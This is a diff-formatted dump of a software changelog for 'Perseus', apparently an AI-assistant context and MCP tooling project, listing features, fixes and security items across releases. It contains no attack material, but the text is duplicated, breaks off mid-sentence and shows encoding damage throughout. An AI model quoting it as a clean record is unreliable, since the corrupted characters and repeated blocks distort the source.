(`@mneme` directive). The `@memory` directive now routes exclusively through +479|479|480|> MnΔ“mΔ“ v2. See Β§MnΔ“mΔ“ v2 below. +480|480|481| +481|481|482|- **task-86** β€” `@bastra` directive: query persistent memories via the bastra-recall HTTP API. *(Removed β€” use `@mneme` instead.)* +482|482|483|- **task-87** β€” `_bastra_recall()` HTTP client *(Removed.)* +483|483|484|- **task-88** β€” `@memory` backend routing *(Removed β€” unified under MnΔ“mΔ“ v2.)* +484|484|485|- **task-89** β€” `memory.backend` and `bastra_url` config keys *(Removed.)* +485|485|486|- **task-90** β€” 20 new tests *(Removed with the feature.)* +486|486|487| +487|487|488|## [1.0.4] β€” 2026-05-25 +488|488|489| +489|489|490|**Phase 24 β€” Extensibility Architecture (Hephaestus):** +490|490|491| +491|491|492|- **task-65** β€” Plugin directive system: auto-discovered Python plugins under `~/.perseus/plugins/`. Each module exports a `REGISTER` dict of `DirectiveSpec` entries. Plugin errors are warnings, not fatal. +492|492|493|- **task-66** β€” Directive macros: `@macro name ... @endmacro` blocks in context documents or `.perseus/macros.md`. Pre-processing pass expands invocations before the resolver loop. +493|493|494|- **task-67** β€” Render pipeline hooks: lifecycle callbacks (`on_render_start`, `on_directive_resolved`, `on_cache_hit/miss`, `on_render_complete`, `on_directive_error`) via shell commands or Python callbacks. +494|494|495|- **task-68** β€” Output format adapters: plugin interface for custom formats beyond markdown/HTML. `perseus render --format json` returns structured `{resolved, directives}` output. +495|495|496|- **task-69** β€” Foreign resolver protocol: `@perseus ` fetches rendered context from remote Perseus serve instances. HMAC signature verification, TTL caching, graceful degradation. +496|496|497|- **task-70** β€” Custom schema validators: plugin validators in `.perseus/schemas/`. Referenced via `schema="plugin:my-validator"`. Works alongside the built-in validator. +497|497|498|- **task-71** β€” Pipe syntax: lightweight chaining β€” `@query "ls" | @cache ttl=300`. Left-to-right resolution, output of stage N becomes input of stage N+1. +498|498|499|- **task-72** β€” Event webhooks: POST render lifecycle events to external URLs with optional HMAC-SHA256 signing. Config-driven with per-event selection. +499|499|500|- **task-73** β€” Tool directive integration: `@tool "path/to/tool"` with config-based allowlist, argument restrictions, timeouts, and output size caps. +500|500|501|- **task-74** β€” Directive aliasing: config-driven shorthand β€” `@qβ†’@query`, `@svcβ†’@services`. Single-pass expansion, built-ins always win collisions. +501|501|502| +502|502|503|**Phase 25 β€” MCP Deep Integration:** +503|503|504| +504|504|505|- **task-75** β€” Expose every directive as an MCP tool. `perseus mcp serve` runs a JSON-RPC 2.0 MCP server over stdio. Each `DIRECTIVE_REGISTRY` entry becomes a `perseus_` tool with auto-generated descriptions and input schemas. Trust gates enforced per-tool. Backward compatible with existing `perseus_get_context` / `perseus_get_health`. +505|505|506| +506|506|507|## [1.0.3] β€” 2026-05-24 +507|507|508| +508|508|509|**Phase 24 β€” Assistant format targets, hook installer, MCP server (~840 lines):** +509|509|510| +510|510|511|- **task-77** β€” Assistant format targets: `perseus render --format agents-md|claude-md|cursorrules|copilot-instructions` +511|511|512| renders `.perseus/context.md` into every major assistant's native context file. Auto-resolves +512|512|513| default output paths. Each file gets a "Generated by Perseus" header pointing back to the source. +513|513|514|- **task-78** β€” Hook installer: `perseus install --target claude-code` drops SessionStart + UserPromptSubmit +514|514|515| hooks into `.claude/settings.json` for automatic context injection at session start and on every +515|515|516| prompt. Also supports `--target cursor`, `gemini-cli`, `copilot`. Smart merge preserves existing hooks. +516|516|517|- **task-79** β€” MCP server faΓ§ade: `perseus mcp serve` runs as a JSON-RPC 2.0 MCP server over stdio, exposing +517|517|518| 13 Perseus directives as native MCP tools (query, services, memory, skills, waypoint, session, +518|518|519| agora, inbox, read, env, health, agent, date). `mcp config` prints ready-to-paste client configs. +519|519|520| +520|520|521|**Distribution:** +521|521|522| +522|522|523|- **task-80** β€” MCP Registry listing published live (`server.json`) β€” 13 tools, PyPI transport. +523|523|524|- **task-81** β€” Anthropic Skills marketplace listing (`SKILL.md`) β€” ready for PR to `anthropics/skills`. +524|524|525|- `pyproject.toml` version bumped to 1.0.3. +525|525|526| +526|526|527|**Show HN preparation:** +527|527|528| +528|528|529|- **task-82** β€” Swarm demo script β€” 120 agents, 4 batches, 51 frames of parallel multi-agent coordination. +529|529|530|- **task-83** β€” Swarm demo GIF re-themed to match perseus.observer palette; added to README Multi-Agent section. +530|530|531|- **task-84** β€” Show HN post draft. +531|531|532|- **task-85** β€” Cyberpunk v2 landing page deployed to perseus.observer. +532|532|533| +533|533|534|**CI, docs, and tooling:** +534|534|535| +535|535|536|- GitHub Actions CI workflow with coverage on Python 3.10/3.11/3.12. +536|536|537|- `.coveragerc` β€” 70% coverage threshold. +537|537|538|- 596 tests passing, 1 skipped. +538|538|539| +539|539|540|## [1.0.2] β€” 2026-05-23 +540|540|541| +541|541|542|**Bug fixes (Opus 4.7 Max / Codex 5.5 Extreme High benchmarks):** +542|542|543| +543|543|544|- **task-63** β€” Fixed `Path.write_text` missing encoding on Windows β€” emoji (πŸ“Œ) crash in default prompts. +544|544|545|- **task-64** β€” Fixed `/bin/bash` unreachable on native Windows Python β€” added `_get_shell()` helper +545|545|546| using `shutil.which()` with system-default fallback for `@query`, `@services`, and `@agent`. +546|546|547|- **task-65** β€” Fixed `@query` binary stdout NoneType crash β€” guarded `result.stdout` with `or ""`. +547|547|548|- **task-66** β€” Fixed `perseus --help` crash on Windows (MnΔ“mΔ“ macron `Δ“` can't encode to `cp1252`) β€” +548|548|549| added `sys.stdout/stderr.reconfigure(encoding="utf-8")` at import time. +549|549|550| +550|550|551|**New features:** +551|551|552| +552|552|553|- **task-67** β€” **`render.max_query_bytes`** (default 256 KB) β€” caps runaway `@query` stdout with a +553|553|554| visible truncation marker. Prevents 12 MB scanner output from silently inflating +554|554|555| context documents (47Γ— output reduction demonstrated). +555|555|556|- **task-68** β€” **Configurable `@query` timeout** β€” `render.query_timeout_s` (default 30s) and per-directive +556|556|557| `timeout=N` modifier (e.g. `@query "..." timeout=120`). +557|557|558|- **task-69** β€” **`render.parallel_services`** (opt-in, default off) β€” concurrent `@services` health checks +558|558|559| via `ThreadPoolExecutor`. 100 services go from ~5 min serial to ~3 s parallel. +559|559|560|- **task-70** β€” **`render.parallel_queries`** (opt-in, default off) β€” pre-scans top-level `@query` directives +560|560|561| and resolves them concurrently. Directives inside `@if` branches remain sequential. +561|561|562| +562|562|563|**Integrations:** +563|563|564| +564|564|565|- **task-71** β€” **VS Code / Cursor extension** β€” auto-renders on `.perseus/context.md` save, status bar +565|565|566| indicator, auto-detects target assistant file, watch mode. +566|566|567|- **task-72** β€” **Claude Code session hook** β€” one `curl` install, runs `perseus render` before every +567|567|568| Claude Code session. +568|568|569|- **task-73** β€” **GitHub Action** β€” renders context on push/schedule, commits back to repo so every +569|569|570| developer gets pre-resolved context without installing Perseus locally. +570|570|571| +571|571|572|**Multi-agent coordination:** +572|572|573| +573|573|574|- **task-74** β€” **Shared checkpoint store** β€” agents across machines/sessions share a single checkpoint +574|574|575| store (config: `checkpoints.store` path, accessible via NFS/SMB/unison). +575|575|576|- **task-75** β€” **Lock file mechanism** β€” `os.O_CREAT | os.O_EXCL` atomic lock in the checkpoint +576|576|577| store prevents concurrent writers from clobbering. Retries with backoff for ~11s before failing +577|577|578| gracefully. NFS-safe (O_CREAT | O_EXCL is atomic cross-filesystem). +578|578|579|- **task-76** β€” **Checkpoint recovery** β€” `perseus recover --from ` reads the latest checkpoint +579|579|580| and prints the workspace/task/status triplet so an agent dropped into a terminal knows exactly +580|580|581| where to resume. +581|581|582| +582|582|583|**Benchmarks:** +583|583|584| +584|584|585|- Extreme scaling sweep on Linux: 10 β†’ 10,000 `@query` directives, 4 modes each +585|585|586| (sequential, cached, parallel, cached+parallel). Cache warm time stays flat at +586|586|587| ~0.3–0.5s regardless of scale. 10,000 queries at 0.52s warm (25Γ— vs 13.1s cold). +587|587|588|- Integrated heavy benchmark suite (`benchmark/heavy/`) with 4 reports, setup harnesses, +588|588|589| machine-readable result JSONs from Claude Code Opus 4.7 and Codex 5.5 Extreme High runs. +589|589|590|- Efficiency infographic on README showing coldβ†’warm scaling curve and 40Γ— warm speedup. +590|590|591| +591|591|592|**CI, docs, and tooling:** +592|592|593| +593|593|594|- Added GitHub Actions CI workflow with coverage on Python 3.10/3.11/3.12. +594|594|595|- Added `.coveragerc` β€” 70% coverage threshold. +595|595|596|- Updated `.gitignore` for generated context files (CLAUDE.md, AGENTS.md, .cursorrules). +596|596|597|- Updated demo GIF with 6-scene coldβ†’warm walkthrough. +597|597|598|- 540 tests passing, 1 skipped. 70% coverage on the 10,463-line artifact. +598|598|599| +599|599|600|## [1.0.1] β€” 2026-05-21 +600|600|601| +601|601|602|Patch release: corrects the PyPI author field to the GitHub handle (`tcconnally`). +602|602|603|No code changes; all 496 tests pass. +603|603|604| +604|604|605|- **task-62** (follow-up) β€” post-release doc and metadata fixes: corrected PyPI author +605|605|606| field, updated test-count references across README/docs/index.md to reflect live count +606|606|607| (496 passed, 1 skipped), and aligned PRODUCT_CONTRACT.md status to v1.0.1 stable. +607|607|608| +608|608|609|## [1.0.0] β€” 2026-05-20 +609|609|610| +610|610|611|All Phase 1–22 tasks complete. Perseus v1.0.0 β€” the first stable release. +611|611|612| +612|612|613|- **task-56** β€” Phase 20C: added headless watch mode (`perseus watch`) β€” inotify/polling +613|613|614| file watcher with configurable interval, re-render on change, and debounce. Degrades +614|614|615| gracefully when watchdog is unavailable. +615|615|616|- **task-57** β€” Phase 21A: added golden evaluation corpus under `tests/fixtures/golden/` +616|616|617| covering render, synthesis, and Pythia output shapes; deterministic comparison harness +617|617|618| in `tests/test_golden.py`. +618|618|619|- **task-58** β€” Phase 21B: added performance budget framework (`tests/test_perf_budgets.py`) +619|619|620| with per-command cold/warm timing, advisory warnings at 2Γ— budget, and configurable +620|620|621| thresholds. Three commands (render, graph, prefetch) emit advisory warnings in the +621|621|622| current environment β€” not failures. +622|622|623|- **task-59** β€” Phase 21C: added compatibility and migration suite (`tests/test_compat_migration.py`) +623|623|624| covering checkpoint round-trip compatibility, config migration (`oracle:` β†’ `pythia:` rename), +624|624|625| pack manifest version handling, and install/upgrade smoke paths. +625|625|626|- **task-60** β€” Phase 22A: added `docs/index.md` (documentation hub), `docs/quickstart.md` +626|626|627| (install-to-render in 10 steps), and `docs/CONTRIBUTING.md` (contributor guide with +627|627|628| single-file constraint, directive authoring 4-touch pattern, test conventions, Agora +628|628|629| workflow). Updated README with `## Documentation` section. +629|629|630|- **task-61** β€” Phase 22B: added `examples/` with three runnable demo workspaces: +630|630|631| `local-cli/` (render, checkpoint, recover, suggest, doctor), `assistant-profile/` +631|631|632| (context pack, hermes profile, @memory + @agora), and `container/README.md` (Docker +632|632|633| mount and auth guide). Smoke scripts verified end-to-end. +633|633|634|- **task-62** β€” Phase 22C: v1 release candidate checklist. 493 tests passing (1 skipped +634|634|635| TCP smoke). Release artifacts built and checksums verified. README/CHANGELOG/ROADMAP +635|635|636| docs aligned. Version bumped to `1.0.0-rc.1`. Known limitations documented. +636|636|637| +637|637|638|## [1.0.0-rc.1] β€” 2026-05-20 +638|638|639| +639|639|640|Release candidate β€” superseded by v1.0.0. +640|640|641| +641|641|642|- **task-63** β€” Completed the Oracle β†’ Pythia internal rename while preserving the +642|642|643| public `perseus oracle` CLI compatibility surface. Added legacy `oracle:` +643|643|644| config warnings and one-time `oracle_log.jsonl` β†’ `pythia_log.jsonl` +644|644|645| migration. +645|645|646|- **task-49** β€” Phase 18B: added `tests/test_release.py` (16 tests) covering all +646|646|647| release artifact acceptance criteria β€” version coherence, repeatability, +647|647|648| SHA256SUMS integrity, CHANGELOG task mapping, and tarball contents. +648|648|649|- **task-50** β€” Phase 18C: aligned scheduler behavior and docs around +649|649|650| host-neutral POSIX crontab generation, macOS launchd, Linux systemd, and +650|650|651| explicitly deferred native Windows Task Scheduler support. Added scheduler +651|651|652| smoke tests and repaired release artifact portability on macOS/BSD tar. +652|652|653|- **task-51** β€” Phase 19A: added offline adapter conformance fixtures and a +653|653|654| parametrized harness covering generic, Hermes, Codex, Claude Code, Cursor, +654|654|655| and Rovo Dev render outputs, pack manifests, and integration docs. +655|655|656|- **task-52** β€” Phase 19B: promoted product profiles into a documented gallery +656|656|657| with output paths, trust defaults, refresh guidance, non-interactive generation +657|657|658| tests, and hardcoded-path guards for all six supported profiles. +658|658|659|- **task-53** β€” Phase 19C: polished the VSCode extension for release with +659|659|660| reproducible packaging docs, package scripts, LSP render/checkpoint/mutation +660|660|661| smoke tests, and static package-manifest checks. +661|661|662|- **task-54** β€” Phase 20A: added optional bearer-token authentication for +662|662|663| `perseus serve`, a token generator, non-loopback bind safety gates, trust +663|663|664| report serve fields, and HTTP auth tests. +664|664|665|- **task-55** β€” Phase 20B: added a single-file-runtime container image, +665|665|666| compose examples for render and authenticated serve, container trust docs, +666|666|667| and static/optional Docker smoke tests. +667|667|668|- **task-56** β€” Phase 20C: added `perseus watch`, a dependency-free polling +668|668|669| loop for refreshing single source files or context-pack render targets, with +669|669|670| deterministic debounce tests and clean shutdown behavior. +670|670|671| +671|671|672|## [0.9.0] β€” 2026-05-19 +672|672|673| +673|673|674|### Trust, privacy, and local policy (Phase 17) +674|674|675| +675|675|676|- **task-45** β€” Permission profiles (`strict` / `balanced` / `power-user`); `perseus trust` and `--json`; `serve.bind` promoted to config; version bump to 0.9.0. +676|676|677|- **task-46** β€” Secrets redaction (`DEFAULT_REDACTION_RULES`, `redact_text()`) at render/synthesize/serve trust boundaries; source files never mutated; counts-only report. +677|677|678|- **task-47** β€” Audit log (`audit_event()` JSONL with rotation); emitters at 5 trust boundaries; `perseus trust audit [--tail N] [--json]`; default `perseus trust` shows audit posture; secret values never persisted. +678|678|679| +679|679|680|### Distribution (Phase 18) +680|680|681| +681|681|682|- **task-48** β€” Installer bootstrap (`scripts/install.sh` + `INSTALL.md`); preserves the single-file runtime; verifies Python 3.10+ and `pyyaml`; idempotent upgrade and clean uninstall. +682|682|683|- **task-49** β€” Release artifacts and versioning: `VERSION` file as source of truth, `scripts/release.sh` produces a deterministic tarball + zip + SHA256SUMS, this changelog, and version-coherence checks (perseus.py / VERSION / CHANGELOG). +683|683|684| +684|684|685|### Verification +685|685|686| +686|686|687|- Tests: 393 passing, 0 skipped. +687|687|688|- Single-file runtime: `perseus.py` (`pyyaml` only). +688|688|689| +689|689|690|## [0.8.x and earlier] +690|690|691| +691|691|692|Pre-Phase 17 history is tracked in `tasks/` (closed task files) and `HANDOFF.md`. +692|692|693|694| +693|693|694|# Changelog +694|695| +695|696|All notable changes to Perseus. +696|697| +697|698|This project follows the alpha-then-semver convention: +698|699|during the alpha (pre-`1.0.0`) phase, minor bumps may include breaking changes +699|700|that are documented in the release notes. +700|701| +701|702|Each entry maps a release to the task IDs that shipped in it. The +702|703|single-file `perseus.py` runtime is the only required artifact; everything +703|704|else (installer, docs) is generated by `scripts/release.sh`. +704|705| +705|706|## [1.0.6] β€” UNRELEASED +706|707| +707|708|Critical security + correctness hotfix bundle. See GitHub milestone +708|709|[v1.0.6](https://github.com/tcconnally/perseus/milestone/1). +709|710| +710|711|### πŸ› Bug Fixes +711|712| +712|713|- **#139** β€” MCP `_call_tool` timeout actually kills the subprocess tree +713|714| and no longer blocks on executor shutdown. Pre-1.0.6 had two coupled +714|715| bugs: +715|716| 1. `future.result(timeout=…)` only abandoned the future β€” the worker +716|717| thread (and any subprocess it had spawned) kept running, leaking +717|718| CPU + side effects. +718|719| 2. The wrapper was a `with concurrent.futures.ThreadPoolExecutor(...)` +719|720| block, so `executor.shutdown(wait=True)` ran on exit β€” blocking the +720|721| MCP response until the abandoned worker finished. A 5s timeout on +721|722| `sleep 600` blocked the MCP response for ~600s. +722|723| +723|724| Fix: +724|725| - `_call_tool()` now uses a non-context-managed executor and calls +725|726| `shutdown(wait=False, cancel_futures=True)` in a `finally` block. +726|727| Response returns within ~timeout seconds, not ~sleep seconds. +727|728| - `directives/query.py::resolve_query` now launches its subprocess +728|729| with `start_new_session=True` (POSIX) so the child gets its own +729|730| process group, and registers the popen handle in a module-level +730|731| thread-keyed dict. +731|732| - On timeout, `_call_tool` looks up the worker thread's subprocess +732|733| and calls a new `kill_active_subprocess_for_thread(tid)` which +733|734| `os.killpg(pgid, SIGTERM)` (then `SIGKILL` if needed) on POSIX, or +734|735| `taskkill /F /T /PID` on Windows. The entire subprocess tree is +735|736| taken down atomically. +736|737| - Timeout response surfaces the kill with a `" (subprocess killed)"` +737|738| suffix so operators can see the kill actually fired. +738|739| +739|740|### πŸ”’ Security (other v1.0.6 items, tracked in milestone) +740|741|- #136 β€” `long_hex_secret` redaction rule corrupted git hashes (PR #159) +741|742|- #137 β€” `@query` audit log leaked secrets (PR #160) +742|743|- #138, #140, #141, #142 +743|744| +744|745|### πŸ› Bug Fixes (other v1.0.6 items) +745|746|- #128 β€” MnΔ“mΔ“ narrative MD5β†’SHA-256 migration (PR #161) +746|747|- #131 β€” `memory compact` wall-clock deadline (PR #162) +747|748|- #129, #130, #135 +748|749| +749|750|### πŸ“¦ Migration Notes +750|751|- No config breaking changes. Behavior under timeout is strictly safer. +751|752| +752|753|--- +753|754| +754|755|## [1.0.5] β€” 2026-05-26 +755|756| +756|757|**Bastra-Recall β€” Persistent Memory Backend (superseded by MnΔ“mΔ“ v2 in 1.0.6):** +757|758| +758|759|> ⚠ The `@bastra` directive and `memory.backend = "bastra"` config were removed in a +759|760|> subsequent release and replaced by the native MnΔ“mΔ“ v2 SQLite FTS5 backend +760|761|> (`@mneme` directive). The `@memory` directive now routes exclusively through +761|762|> MnΔ“mΔ“ v2. See Β§MnΔ“mΔ“ v2 below. +762|763| +763|764|- **task-86** β€” `@bastra` directive: query persistent memories via the bastra-recall HTTP API. *(Removed β€” use `@mneme` instead.)* +764|765|- **task-87** β€” `_bastra_recall()` HTTP client *(Removed.)* +765|766|- **task-88** β€” `@memory` backend routing *(Removed β€” unified under MnΔ“mΔ“ v2.)* +766|767|- **task-89** β€” `memory.backend` and `bastra_url` config keys *(Removed.)* +767|768|- **task-90** β€” 20 new tests *(Removed with the feature.)* +768|769| +769|770|## [1.0.4] β€” 2026-05-25 +770|771| +771|772|**Phase 24 β€” Extensibility Architecture (Hephaestus):** +772|773| +773|774|- **task-65** β€” Plugin directive system: auto-discovered Python plugins under `~/.perseus/plugins/`. Each module exports a `REGISTER` dict of `DirectiveSpec` entries. Plugin errors are warnings, not fatal. +774|775|- **task-66** β€” Directive macros: `@macro name ... @endmacro` blocks in context documents or `.perseus/macros.md`. Pre-processing pass expands invocations before the resolver loop. +775|776|- **task-67** β€” Render pipeline hooks: lifecycle callbacks (`on_render_start`, `on_directive_resolved`, `on_cache_hit/miss`, `on_render_complete`, `on_directive_error`) via shell commands or Python callbacks. +776|777|- **task-68** β€” Output format adapters: plugin interface for custom formats beyond markdown/HTML. `perseus render --format json` returns structured `{resolved, directives}` output. +777|778|- **task-69** β€” Foreign resolver protocol: `@perseus ` fetches rendered context from remote Perseus serve instances. HMAC signature verification, TTL caching, graceful degradation. +778|779|- **task-70** β€” Custom schema validators: plugin validators in `.perseus/schemas/`. Referenced via `schema="plugin:my-validator"`. Works alongside the built-in validator. +779|780|- **task-71** β€” Pipe syntax: lightweight chaining β€” `@query "ls" | @cache ttl=300`. Left-to-right resolution, output of stage N becomes input of stage N+1. +780|781|- **task-72** β€” Event webhooks: POST render lifecycle events to external URLs with optional HMAC-SHA256 signing. Config-driven with per-event selection. +781|782|- **task-73** β€” Tool directive integration: `@tool "path/to/tool"` with config-based allowlist, argument restrictions, timeouts, and output size caps. +782|783|- **task-74** β€” Directive aliasing: config-driven shorthand β€” `@qβ†’@query`, `@svcβ†’@services`. Single-pass expansion, built-ins always win collisions. +783|784| +784|785|**Phase 25 β€” MCP Deep Integration:** +785|786| +786|787|- **task-75** β€” Expose every directive as an MCP tool. `perseus mcp serve` runs a JSON-RPC 2.0 MCP server over stdio. Each `DIRECTIVE_REGISTRY` entry becomes a `perseus_` tool with auto-generated descriptions and input schemas. Trust gates enforced per-tool. Backward compatible with existing `perseus_get_context` / `perseus_get_health`. +787|788| +788|789|## [1.0.3] β€” 2026-05-24 +789|790| +790|791|**Phase 24 β€” Assistant format targets, hook installer, MCP server (~840 lines):** +791|792| +792|793|- **task-77** β€” Assistant format targets: `perseus render --format agents-md|claude-md|cursorrules|copilot-instructions` +793|794| renders `.perseus/context.md` into every major assistant's native context file. Auto-resolves +794|795| default output paths. Each file gets a "Generated by Perseus" header pointing back to the source. +795|796|- **task-78** β€” Hook installer: `perseus install --target claude-code` drops SessionStart + UserPromptSubmit +796|797| hooks into `.claude/settings.json` for automatic context injection at session start and on every +797|798| prompt. Also supports `--target cursor`, `gemini-cli`, `copilot`. Smart merge preserves existing hooks. +798|799|- **task-79** β€” MCP server faΓ§ade: `perseus mcp serve` runs as a JSON-RPC 2.0 MCP server over stdio, exposing +799|800| 13 Perseus directives as native MCP tools (query, services, memory, skills, waypoint, session, +800|801| agora, inbox, read, env, health, agent, date). `mcp config` prints ready-to-paste client configs. +801|802| +802|803|**Distribution:** +803|804| +804|805|- **task-80** β€” MCP Registry listing published live (`server.json`) β€” 13 tools, PyPI transport. +805|806|- **task-81** β€” Anthropic Skills marketplace listing (`SKILL.md`) β€” ready for PR to `anthropics/skills`. +806|807|- `pyproject.toml` version bumped to 1.0.3. +807|808| +808|809|**Show HN preparation:** +809|810| +810|811|- **task-82** β€” Swarm demo script β€” 120 agents, 4 batches, 51 frames of parallel multi-agent coordination. +811|812|- **task-83** β€” Swarm demo GIF re-themed to match perseus.observer palette; added to README Multi-Agent section. +812|813|- **task-84** β€” Show HN post draft. +813|814|- **task-85** β€” Cyberpunk v2 landing page deployed to perseus.observer. +814|815| +815|816|**CI, docs, and tooling:** +816|817| +817|818|- GitHub Actions CI workflow with coverage on Python 3.10/3.11/3.12. +818|819|- `.coveragerc` β€” 70% coverage threshold. +819|820|- 596 tests passing, 1 skipped. +820|821| +821|822|## [1.0.2] β€” 2026-05-23 +822|823| +823|824|**Bug fixes (Opus 4.7 Max / Codex 5.5 Extreme High benchmarks):** +824|825| +825|826|- **task-63** β€” Fixed `Path.write_text` missing encoding on Windows β€” emoji (πŸ“Œ) crash in default prompts. +826|827|- **task-64** β€” Fixed `/bin/bash` unreachable on native Windows Python β€” added `_get_shell()` helper +827|828| using `shutil.which()` with system-default fallback for `@query`, `@services`, and `@agent`. +828|829|- **task-65** β€” Fixed `@query` binary stdout NoneType crash β€” guarded `result.stdout` with `or ""`. +829|830|- **task-66** β€” Fixed `perseus --help` crash on Windows (MnΔ“mΔ“ macron `Δ“` can't encode to `cp1252`) β€” +830|831| added `sys.stdout/stderr.reconfigure(encoding="utf-8")` at import time. +831|832| +832|833|**New features:** +833|834| +834|835|- **task-67** β€” **`render.max_query_bytes`** (default 256 KB) β€” caps runaway `@query` stdout with a +835|836| visible truncation marker. Prevents 12 MB scanner output from silently inflating +836|837| context documents (47Γ— output reduction demonstrated). +837|838|- **task-68** β€” **Configurable `@query` timeout** β€” `render.query_timeout_s` (default 30s) and per-directive +838|839| `timeout=N` modifier (e.g. `@query "..." timeout=120`). +839|840|- **task-69** β€” **`render.parallel_services`** (opt-in, default off) β€” concurrent `@services` health checks +840|841| via `ThreadPoolExecutor`. 100 services go from ~5 min serial to ~3 s parallel. +841|842|- **task-70** β€” **`render.parallel_queries`** (opt-in, default off) β€” pre-scans top-level `@query` directives +842|843| and resolves them concurrently. Directives inside `@if` branches remain sequential. +843|844| +844|845|**Integrations:** +845|846| +846|847|- **task-71** β€” **VS Code / Cursor extension** β€” auto-renders on `.perseus/context.md` save, status bar +847|848| indicator, auto-detects target assistant file, watch mode. +848|849|- **task-72** β€” **Claude Code session hook** β€” one `curl` install, runs `perseus render` before every +849|850| Claude Code session. +850|851|- **task-73** β€” **GitHub Action** β€” renders context on push/schedule, commits back to repo so every +851|852| developer gets pre-resolved context without installing Perseus locally. +852|853| +853|854|**Multi-agent coordination:** +854|855| +855|856|- **task-74** β€” **Shared checkpoint store** β€” agents across machines/sessions share a single checkpoint +856|857| store (config: `checkpoints.store` path, accessible via NFS/SMB/unison). +857|858|- **task-75** β€” **Lock file mechanism** β€” `os.O_CREAT | os.O_EXCL` atomic lock in the checkpoint +858|859| store prevents concurrent writers from clobbering. Retries with backoff for ~11s before failing +859|860| gracefully. NFS-safe (O_CREAT | O_EXCL is atomic cross-filesystem). +860|861|- **task-76** β€” **Checkpoint recovery** β€” `perseus recover --from ` reads the latest checkpoint +861|862| and prints the workspace/task/status triplet so an agent dropped into a terminal knows exactly +862|863| where to resume. +863|864| +864|865|**Benchmarks:** +865|866| +866|867|- Extreme scaling sweep on Linux: 10 β†’ 10,000 `@query` directives, 4 modes each +867|868| (sequential, cached, parallel, cached+parallel). Cache warm time stays flat at +868|869| ~0.3–0.5s regardless of scale. 10,000 queries at 0.52s warm (25Γ— vs 13.1s cold). +869|870|- Integrated heavy benchmark suite (`benchmark/heavy/`) with 4 reports, setup harnesses, +870|871| machine-readable result JSONs from Claude Code Opus 4.7 and Codex 5.5 Extreme High runs. +871|872|- Efficiency infographic on README showing coldβ†’warm scaling curve and 40Γ— warm speedup. +872|873| +873|874|**CI, docs, and tooling:** +874|875| +875|876|- Added GitHub Actions CI workflow with coverage on Python 3.10/3.11/3.12. +876|877|- Added `.coveragerc` β€” 70% coverage threshold. +877|878|- Updated `.gitignore` for generated context files (CLAUDE.md, AGENTS.md, .cursorrules). +878|879|- Updated demo GIF with 6-scene coldβ†’warm walkthrough. +879|880|- 540 tests passing, 1 skipped. 70% coverage on the 10,463-line artifact. +880|881| +881|882|## [1.0.1] β€” 2026-05-21 +882|883| +883|884|Patch release: corrects the PyPI author field to the GitHub handle (`tcconnally`). +884|885|No code changes; all 496 tests pass. +885|886| +886|887|- **task-62** (follow-up) β€” post-release doc and metadata fixes: corrected PyPI author +887|888| field, updated test-count references across README/docs/index.md to reflect live count +888|889| (496 passed, 1 skipped), and aligned PRODUCT_CONTRACT.md status to v1.0.1 stable. +889|890| +890|891|## [1.0.0] β€” 2026-05-20 +891|892| +892|893|All Phase 1–22 tasks complete. Perseus v1.0.0 β€” the first stable release. +893|894| +894|895|- **task-56** β€” Phase 20C: added headless watch mode (`perseus watch`) β€” inotify/polling +895|896| file watcher with configurable interval, re-render on change, and debounce. Degrades +896|897| gracefully when watchdog is unavailable. +897|898|- **task-57** β€” Phase 21A: added golden evaluation corpus under `tests/fixtures/golden/` +898|899| covering render, synthesis, and Pythia output shapes; deterministic comparison harness +899|900| in `tests/test_golden.py`. +900|901|- **task-58** β€” Phase 21B: added performance budget framework (`tests/test_perf_budgets.py`) +901|902| with per-command cold/warm timing, advisory warnings at 2Γ— budget, and configurable +902|903| thresholds. Three commands (render, graph, prefetch) emit advisory warnings in the +903|904| current environment β€” not failures. +904|905|- **task-59** β€” Phase 21C: added compatibility and migration suite (`tests/test_compat_migration.py`) +905|906| covering checkpoint round-trip compatibility, config migration (`oracle:` β†’ `pythia:` rename), +906|907| pack manifest version handling, and install/upgrade smoke paths. +907|908|- **task-60** β€” Phase 22A: added `docs/index.md` (documentation hub), `docs/quickstart.md` +908|909| (install-to-render in 10 steps), and `docs/CONTRIBUTING.md` (contributor guide with +909|910| single-file constraint, directive authoring 4-touch pattern, test conventions, Agora +910|911| workflow). Updated README with `## Documentation` section. +911|912|- **task-61** β€” Phase 22B: added `examples/` with three runnable demo workspaces: +912|913| `local-cli/` (render, checkpoint, recover, suggest, doctor), `assistant-profile/` +913|914| (context pack, hermes profile, @memory + @agora), and `container/README.md` (Docker +914|915| mount and auth guide). Smoke scripts verified end-to-end. +915|916|- **task-62** β€” Phase 22C: v1 release candidate checklist. 493 tests passing (1 skipped +916|917| TCP smoke). Release artifacts built and checksums verified. README/CHANGELOG/ROADMAP +917|918| docs aligned. Version bumped to `1.0.0-rc.1`. Known limitations documented. +918|919| +919|920|## [1.0.0-rc.1] β€” 2026-05-20 +920|921| +921|922|Release candidate β€” superseded by v1.0.0. +922|923| +923|924|- **task-63** β€” Completed the Oracle β†’ Pythia internal rename while preserving the +924|925| public `perseus oracle` CLI compatibility surface. Added legacy `oracle:` +925|926| config warnings and one-time `oracle_log.jsonl` β†’ `pythia_log.jsonl` +926|927| migration. +927|928|- **task-49** β€” Phase 18B: added `tests/test_release.py` (16 tests) covering all +928|929| release artifact acceptance criteria β€” version coherence, repeatability, +929|930| SHA256SUMS integrity, CHANGELOG task mapping, and tarball contents. +930|931|- **task-50** β€” Phase 18C: aligned scheduler behavior and docs around +931|932| host-neutral POSIX crontab generation, macOS launchd, Linux systemd, and +932|933| explicitly deferred native Windows Task Scheduler support. Added scheduler +933|934| smoke tests and repaired release artifact portability on macOS/BSD tar. +934|935|- **task-51** β€” Phase 19A: added offline adapter conformance fixtures and a +935|936| parametrized harness covering generic, Hermes, Codex, Claude Code, Cursor, +936|937| and Rovo Dev render outputs, pack manifests, and integration docs. +937|938|- **task-52** β€” Phase 19B: promoted product profiles into a documented gallery +938|939| with output paths, trust defaults, refresh guidance, non-interactive generation +939|940| tests, and hardcoded-path guards for all six supported profiles. +940|941|- **task-53** β€” Phase 19C: polished the VSCode extension for release with +941|942| reproducible packaging docs, package scripts, LSP render/checkpoint/mutation +942|943| smoke tests, and static package-manifest checks. +943|944|- **task-54** β€” Phase 20A: added optional bearer-token authentication for +944|945| `perseus serve`, a token generator, non-loopback bind safety gates, trust +945|946| report serve fields, and HTTP auth tests. +946|947|- **task-55** β€” Phase 20B: added a single-file-runtime container image, +947|948| compose examples for render and authenticated serve, container trust docs, +948|949| and static/optional Docker smoke tests. +949|950|- **task-56** β€” Phase 20C: added `perseus watch`, a dependency-free polling +950|951| loop for refreshing 